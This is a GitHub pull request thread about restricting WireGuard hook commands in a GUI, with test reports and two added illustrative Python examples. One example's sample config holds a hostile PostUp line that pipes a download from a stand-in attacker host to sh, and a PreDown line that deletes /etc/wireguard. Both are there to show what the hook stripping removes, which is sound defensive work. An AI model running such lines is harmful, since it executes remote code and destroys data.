
Conversation

@enesoztrk
Contributor

@enesoztrk enesoztrk commented Dec 4, 2025

Description of Changes

Wireguard-gui

  • Replacing the user's ability to freely add PreUp, PreDown, PostUp, PostDown hooks with controlled routing scripts, improving security by preventing arbitrary command execution.
  • Adding embedded logo
  • Improving reliability and robustness of configuration handling.
  • Reducing risk of invalid configurations.
  • Enhancing UI responsiveness with non-blocking I/O.
  • Providing better user feedback and tooling support for scripts and interface binding.

Ghaf

  • Wireguard documentation update
  • Refactoring modules/reference/services/default.nix
  • Firewall configurations for wireguard-gui

Type of Change

  • New Feature
  • Bug Fix
  • Improvement / Refactor

Related Issues / Tickets

tiiuae/wireguard-gui#113
tiiuae/wireguard-gui#125

Checklist

  • Clear summary in PR description
  • Detailed and meaningful commit message(s)
  • Commits are logically organized and squashed if appropriate
  • Contribution guidelines followed
  • Ghaf documentation updated with the commit - https://tiiuae.github.io/ghaf/
  • Author has run make-checks and it passes
  • All automatic GitHub Action checks pass - see actions
  • Author has added reviewers and removed PR draft status

Testing Instructions

Applicable Targets

  • Orin AGX aarch64
  • Orin NX aarch64
  • Lenovo X1 x86_64
  • Dell Latitude x86_64
  • System 76 x86_64

Installation Method

  • Requires full re-installation
  • Can be updated with nixos-rebuild ... switch
  • Other:

Test Steps To Verify:

  1. Follow and try test scenarios with the updated docs version
  2. Import and save the configuration file. Then, verify the settings. The saved config file (located under /etc/wireguard/configs) must not include PreUp, PreDown, PostUp, or PostDown sections, even if the imported file contains them.
  3. Export the file and verify that it includes PreUp, PreDown, PostUp, or PostDown sections, if the config has those sections.
  4. Click Documentation button to open ghaf wireguard documentation automatically. It does not work for business-vm and will be fixed later.

Note:

  • I created 2 wireguard interfaces in testing server.
    wg0 -> running as server
    wg1 -> running as client
  • You need to modify your config based on the WireGuard tunnel IPs, as they do not have the IPs 10.10.10.4 and 10.10.10.0 as described in the document diagram.
  • You may need to set up port forwarding (in router settings) to test the "running as server from ghaf laptop" scenario.

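The two test steps on import and export, as an added example that is not code from tiiuae/wireguard-gui: a small model of what "saved config must not include PreUp/PreDown/PostUp/PostDown" and "exported config may include them" look like as code. wg-quick hands each of those keys to `bash -c` as root, so an imported file that carries them is a command-execution vector; the import path strips them, and the export path re-adds hooks only from a fixed profile with a validated interface name. The hostile sample config, the `ROUTING_PROFILES` table, the interface-name regex and all function names here are constructed for the illustration; they are not the GUI's own routing scripts.

```python
"""Added example, not code from tiiuae/wireguard-gui: models the import/export
rules in the test steps. Sample config, routing profiles and names are constructed."""
import ipaddress
import re
from typing import Dict, List, Tuple

Section = Tuple[str, List[Tuple[str, str]]]

# wg-quick hands each of these values to `bash -c` as root, so an imported
# file that carries them is an arbitrary-command-execution vector.
HOOK_KEYS = {"preup", "postup", "predown", "postdown"}

# Hypothetical fixed profiles standing in for the GUI's "Routing Scripts"
# selector. Only a validated interface name is substituted, never user text.
ROUTING_PROFILES: Dict[str, Dict[str, str]] = {
    "client": {},
    "server": {
        "PostUp": "iptables -A FORWARD -i %i -j ACCEPT; "
                  "iptables -t nat -A POSTROUTING -o {iface} -j MASQUERADE",
        "PostDown": "iptables -D FORWARD -i %i -j ACCEPT; "
                    "iptables -t nat -D POSTROUTING -o {iface} -j MASQUERADE",
    },
}
IFACE_RE = re.compile(r"[A-Za-z0-9_.-]{1,15}")  # Linux IFNAMSIZ is 16 incl. NUL

def parse_wg_config(text: str) -> List[Section]:
    """Ordered (section, [(key, value)]) list; repeated [Peer] sections and
    repeated keys are kept, '#' comments are dropped as wg-quick does."""
    sections: List[Section] = []
    current = None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = (line[1:-1].strip(), [])
            sections.append(current)
        elif current is None or "=" not in line:
            raise ValueError(f"malformed line: {raw!r}")
        else:
            key, value = (s.strip() for s in line.split("=", 1))
            current[1].append((key, value))
    return sections

def strip_hooks(sections: List[Section]):
    """Drop hook keys from every section; return (cleaned, removed)."""
    cleaned, removed = [], []
    for name, kvs in sections:
        kept = [(k, v) for k, v in kvs if k.lower() not in HOOK_KEYS]
        removed += [(k, v) for k, v in kvs if k.lower() in HOOK_KEYS]
        cleaned.append((name, kept))
    return cleaned, removed

def validate_allowed_ips(sections: List[Section]) -> List[str]:
    """Error strings for AllowedIPs entries the kernel would reject."""
    errors = []
    for name, kvs in sections:
        for k, v in kvs:
            if name.lower() == "peer" and k.lower() == "allowedips":
                for cidr in (c.strip() for c in v.split(",") if c.strip()):
                    try:
                        ipaddress.ip_network(cidr, strict=False)
                    except ValueError:
                        errors.append(f"invalid AllowedIPs entry {cidr!r}")
    return errors

def render(sections: List[Section]) -> str:
    """Serialize back to wg-quick INI text."""
    out = []
    for name, kvs in sections:
        out.append(f"[{name}]")
        out.extend(f"{k} = {v}" for k, v in kvs)
        out.append("")
    return "\n".join(out)

def import_config(text: str):
    """Import path: parse, drop hooks, validate. Returns (text to save under
    /etc/wireguard/configs, removed hooks, errors to show in the UI)."""
    cleaned, removed = strip_hooks(parse_wg_config(text))
    return render(cleaned), removed, validate_allowed_ips(cleaned)

def export_config(sections: List[Section], profile: str, iface: str) -> str:
    """Export path: re-add hooks, but only from a fixed profile and with a
    validated interface name, so the file works with plain wg-quick elsewhere."""
    if not IFACE_RE.fullmatch(iface):
        raise ValueError(f"bad interface name {iface!r}")
    hooks = [(k, v.format(iface=iface)) for k, v in ROUTING_PROFILES[profile].items()]
    return render([(n, list(kvs) + (hooks if n.lower() == "interface" else []))
                   for n, kvs in sections])

# Constructed sample of a hostile import (keys are placeholders, not real keys).
IMPORTED = """\
[Interface]
PrivateKey = PLACEHOLDER_BASE64_KEY=
Address = 10.10.10.105/24
PostUp = iptables -A FORWARD -i %i -j ACCEPT; curl http://attacker.example/x | sh
PreDown = rm -rf /etc/wireguard

[Peer]
PublicKey = PLACEHOLDER_BASE64_KEY=
AllowedIPs = 10.10.10.0/24, 0.0.0.0/0, not-an-ip
Endpoint = vpn.example:51820
"""
```

Round-tripping `IMPORTED` through `import_config`, then `export_config(..., "server", "ethint0")`, then `import_config` again yields the same saved text, which is the behaviour the test steps describe: the saved file never contains hook keys, the exported file contains only the profile's hooks, and an interface name such as `eth0; reboot` is rejected before it can reach a hook line.
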
@enesoztrk enesoztrk force-pushed the feat/wireguard-gui-routing-scripts branch from 850d3a1 to 91b0475 on December 7, 2025 11:08
@enesoztrk enesoztrk force-pushed the feat/wireguard-gui-routing-scripts branch from 91b0475 to fdcc4ec on December 8, 2025 21:54
@enesoztrk enesoztrk marked this pull request as ready for review December 9, 2025 08:10
@enesoztrk enesoztrk force-pushed the feat/wireguard-gui-routing-scripts branch from fdcc4ec to d23fa9a on December 9, 2025 08:33
@enesoztrk enesoztrk force-pushed the feat/wireguard-gui-routing-scripts branch from d23fa9a to e60317a on December 9, 2025 08:42
@enesoztrk enesoztrk force-pushed the feat/wireguard-gui-routing-scripts branch from e60317a to 5346707 on December 10, 2025 20:37
@enesoztrk enesoztrk force-pushed the feat/wireguard-gui-routing-scripts branch from 5346707 to ec20099 on December 11, 2025 08:29
@enesoztrk enesoztrk added the Needs Testing CI Team to pre-verify label Dec 11, 2025
@Gaya-03
Collaborator

Gaya-03 commented Dec 12, 2025

As discussed with Enes, the following was observed while performing the initial round of testing:
1. In test step 3, the exported config contains PreUp, PreDown, PostUp, or PostDown sections, and that is expected; the test steps just need to be edited properly.
2. Test steps for Client_full_VPN and VPN as server need to be mentioned. While adding the details for Client_full_VPN I noticed it is not working as mentioned in the currently available documentation.

@Gaya-03
Collaborator

Gaya-03 commented Dec 12, 2025

More from testing progress:
scenario 2: Full-tunnel VPN as Client

  • When AllowedIPs is set to 0.0.0.0/0, ::/0 in the WireGuard UI, the connection does not stay enabled after it is enabled, hence the ping does not work. No UI error is displayed. Video and logs shared with Enes for debugging.
    From the logs:

    Dec 12 11:51:52 chrome-vm wireguard-gui[853]: Cmd: wg-quick up wg0 failed with status code 2. Output:
    [#] ip link add dev wg0 type wireguard
    [#] wg setconf wg0 /dev/fd/63
    [#] ip -4 address add 10.10.10.105/24 dev wg0
    [#] ip link set mtu 1420 up dev wg0
    [#] ip -6 rule add not fwmark 170 table 170
    [#] ip -6 rule add table main suppress_prefixlength 0
    [#] ip -6 route add ::/0 dev wg0 table 170
    Error: IPv6 is disabled on nexthop device.
    [#] ip -6 rule delete table 170
    [#] ip -6 rule delete table main suppress_prefixlength 0
    [#] ip link delete dev wg0
    Dec 12 11:51:52 chrome-vm wireguard-gui[853]: Error toggling tunnel 'wg0': Failed to execute wg-quick up: [#] ip link add dev wg0 type wireguard

scenario 3: VPN as server
- Set up all the prerequisites with port forwarding in the router settings
- Address: 10.10.20.1/32
- ListenPort: 51820 (if WireGuard runs from business-vm) / 51821 (if WireGuard runs from chrome-vm)
- Binding Network Interface: ethint0
- Routing Scripts: Server
Under Peer
- AllowedIPs: 0.0.0.0/0
- Endpoint: unknown
- PublicKey: from wg1

Trying to ping 10.10.20.1 from the test server, the ping is not working. The test steps need to be a bit more detailed on what needs to be set in the test server wg1 and in the wireguard gui in this scenario.

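The wg-quick failure in the scenario 2 log above, as an added example that is not code from tiiuae/wireguard-gui and not part of the comment: wg-quick treats a `0.0.0.0/0` or `::/0` AllowedIPs entry as "route everything", and for each such address family it adds a policy rule (`ip -4/-6 rule add not fwmark N table N`) plus a default route in table N. When IPv6 is disabled on the host, `ip -6 route add ::/0 dev wg0 table N` fails, wg-quick rolls back the rules and deletes the link, and the tunnel never comes up, which is exactly the sequence in the journal. The code below is a pre-flight check a GUI could run on the AllowedIPs field before spawning wg-quick, so the user gets an error instead of a silently dead toggle. It goes one step beyond the page by also warning about the opposite case, an IPv4-only full tunnel on a host where IPv6 is enabled, because that is a general WireGuard property (IPv6 traffic then bypasses the tunnel). The function names and the dict-backed stand-in for `/proc/sys` are constructed for this illustration.

```python
"""Added example, not code from tiiuae/wireguard-gui: a pre-flight check for the
AllowedIPs field that catches the 'IPv6 is disabled on nexthop device' failure
before wg-quick is spawned. Names and the fake sysctl reader are constructed."""
import ipaddress
from pathlib import Path
from typing import Callable, List, Optional, Set

Reader = Callable[[str], Optional[str]]

def _proc_reader(rel: str) -> Optional[str]:
    """Read a sysctl leaf under /proc/sys; None if it does not exist."""
    p = Path("/proc/sys") / rel
    return p.read_text().strip() if p.exists() else None

def dict_reader(table: dict) -> Reader:
    """Constructed stand-in for /proc/sys so the check can run offline."""
    return lambda rel: table.get(rel)

def ipv6_disabled(dev: str, read: Reader = _proc_reader) -> bool:
    """True if `dev` will come up without IPv6: no IPv6 stack at all (with
    ipv6.disable=1 the net/ipv6 sysctl tree is absent), all.disable_ipv6=1,
    or the per-device flag; a device that does not exist yet (wg-quick creates
    wg0 itself) inherits conf/default."""
    all_flag = read("net/ipv6/conf/all/disable_ipv6")
    if all_flag is None:
        return True
    dev_flag = read(f"net/ipv6/conf/{dev}/disable_ipv6")
    if dev_flag is None:
        dev_flag = read("net/ipv6/conf/default/disable_ipv6")
    return all_flag == "1" or dev_flag == "1"

def split_allowed_ips(allowed: str):
    """Parse the comma-separated AllowedIPs field; ValueError on junk."""
    return [ipaddress.ip_network(c.strip(), strict=False)
            for c in allowed.split(",") if c.strip()]

def default_route_families(nets) -> Set[int]:
    """Address families for which wg-quick will install a catch-all route."""
    return {n.version for n in nets if n.prefixlen == 0}

def preflight(allowed: str, dev: str, read: Reader = _proc_reader) -> List[str]:
    """Problems that would make `wg-quick up` fail or leak; [] means go ahead."""
    try:
        fams = default_route_families(split_allowed_ips(allowed))
    except ValueError as e:
        return [f"AllowedIPs: {e}"]   # show this in the UI instead of failing silently
    problems = []
    no_v6 = ipv6_disabled(dev, read)
    if 6 in fams and no_v6:
        problems.append("AllowedIPs has ::/0 but IPv6 is disabled on this host: "
                        "'ip -6 route add ::/0' will fail; drop ::/0 or enable IPv6")
    if 4 in fams and 6 not in fams and not no_v6:
        problems.append("full IPv4 tunnel without ::/0 while IPv6 is enabled: "
                        "IPv6 traffic will bypass the tunnel")
    return problems
```

With the real `/proc/sys` reader, `preflight("0.0.0.0/0, ::/0", "wg0")` on the chrome-vm from the log returns the first message, which is the error the UI was missing; `preflight("0.0.0.0/0", "wg0")` returns nothing there, matching the corrected scenario 2 configuration.
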
Signed-off-by: Enes Öztürk <enes.ozturk@unikie.com>
Signed-off-by: Enes Öztürk <enes.ozturk@unikie.com>
@Gaya-03
Collaborator

Gaya-03 commented Jan 7, 2026

Retested the fix:

  1. An error message is shown after entering an invalid IP in the Peer allowed IP and trying to enable the Test_connection - fixed

  2. The new PDF generated for the WireGuard manual contains the corrected information for the Peer allowed IP in scenario 2 (Full-tunnel VPN as client); fixed in the screenshot of the manual - fixed

  3. Binding Network Interface is corrected to 'ethint0' in the manual - fixed

Errors:

  1. When Generate config is clicked, an unknown connection is created directly, without the information fill-in screen. Was this intentionally part of the change? This is a bad user experience. Newly introduced.

  2. In scenario 2 (Full-tunnel VPN as client) the bidirectional ping works only when the listening port is set to 51820, even when WireGuard is initiated from chrome-vm. The listening port, in my understanding, has to be set to 51821 for chrome-vm and 51820 for business-vm.

  3. Peer allowed IP needs to be edited in the scenario 3 (VPN as Server) screenshot in the manual to reflect 0.0.0.0/0

  4. Still have issues establishing a connection with scenario 3 (VPN as server); however, Enes is able to connect successfully, so ruling it as my home router issue, as the external server pings to the laptop itself did not work well.

  5. Testing instructions in the PR, steps 2 & 3, should be updated to avoid confusion later: the exported file has PreUp, PreDown, PostUp, or PostDown sections, but if you import the file those sections will be cleared.

@Gaya-03 Gaya-03 added Bug on System76 and removed Needs Testing CI Team to pre-verify labels Jan 7, 2026
@enesoztrk enesoztrk force-pushed the feat/wireguard-gui-routing-scripts branch from 2606fdb to 420bb77 on January 9, 2026 07:58
@enesoztrk
Contributor Author

Retested the fix:

  1. An error message is shown after entering an invalid IP in the Peer allowed IP and trying to enable the Test_connection - fixed
  2. The new PDF generated for the WireGuard manual contains the corrected information for the Peer allowed IP in scenario 2 (Full-tunnel VPN as client); fixed in the screenshot of the manual - fixed
  3. Binding Network Interface is corrected to 'ethint0' in the manual - fixed

Errors:

  1. When Generate config is clicked, an unknown connection is created directly, without the information fill-in screen. Was this intentionally part of the change? This is a bad user experience. Newly introduced.
  2. In scenario 2 (Full-tunnel VPN as client) the bidirectional ping works only when the listening port is set to 51820, even when WireGuard is initiated from chrome-vm. The listening port, in my understanding, has to be set to 51821 for chrome-vm and 51820 for business-vm.
  3. Peer allowed IP needs to be edited in the scenario 3 (VPN as Server) screenshot in the manual to reflect 0.0.0.0/0
  4. Still have issues establishing a connection with scenario 3 (VPN as server); however, Enes is able to connect successfully, so ruling it as my home router issue, as the external server pings to the laptop itself did not work well.
  5. Testing instructions in the PR, steps 2 & 3, should be updated to avoid confusion later: the exported file has PreUp, PreDown, PostUp, or PostDown sections, but if you import the file those sections will be cleared.

  1. The change was made intentionally.
  2. The listening port is only important for the "VPN as Server" scenario.
  3. There is no need to set it to 0.0.0.0/0.
  4. It was working for me, but today I couldn't confirm it again. There may be an issue with the testing server. I will check it later.
  5. Done

Signed-off-by: Enes Öztürk <enes.ozturk@unikie.com>
@brianmcgillion brianmcgillion merged commit f2175ed into tiiuae:main Jan 9, 2026
32 checks passed